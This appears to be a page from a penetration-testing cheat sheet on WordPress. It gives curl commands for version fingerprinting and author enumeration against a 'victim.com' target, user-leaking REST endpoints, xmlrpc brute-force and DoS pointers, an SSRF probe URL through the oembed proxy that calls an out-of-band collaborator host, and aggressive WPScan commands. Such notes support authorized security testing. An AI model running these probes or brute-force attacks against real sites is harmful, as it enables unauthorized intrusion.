🔷WordPress

Manual

Information Gathering

license.txt (wordpress version)
wp-activate.php
wp-content/uploads/
wp-includes/
wp-config.php

# get wordpress version
curl https://victim.com/ | grep 'content="WordPress'

Users / IP

Check for usernames : /wp-json/wp/v2/users

Could leak IP addresses : /wp-json/wp/v2/pages

# get author name = potential user
curl -s -I -X GET http://blog.example.com/?author=1

xmlrpc.php

Active

Credentials brute-force or use it to launch DoS attacks

GitHub - relarizky/wpxploit: Simple Python Script For Performing XMLRPC Dictionary AttackGitHub

Exploit

Exploiting the xmlrpc.php on all WordPress versions

SSRF

/wp-json/oembed/1.0/proxy

Try

https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net

WPScan

GitHub - wpscanteam/wpscan: WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites.GitHub

WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites.

Commands - with API

Default

# Enumerate all plugins with known vulnerabilities
wpscan --url $target -e vp --plugins-detection mixed --api-token $YOUR_TOKEN

# Enumerate all plugins in WPSCAN database (could take a very long time)
wpscan --url $target -e ap --plugins-detection mixed --api-token $YOUR_TOKEN

Private Commands - with API

# Deeper scan
wpscan --url $target --ignore-main-redirect --detection-mode aggressive --plugins-detection mixed --api-token $YOUR_TOKEN

PreviousApache NextWordpress eBook Download < 1.2 - CVE-2016-10924

Last updated 1 year ago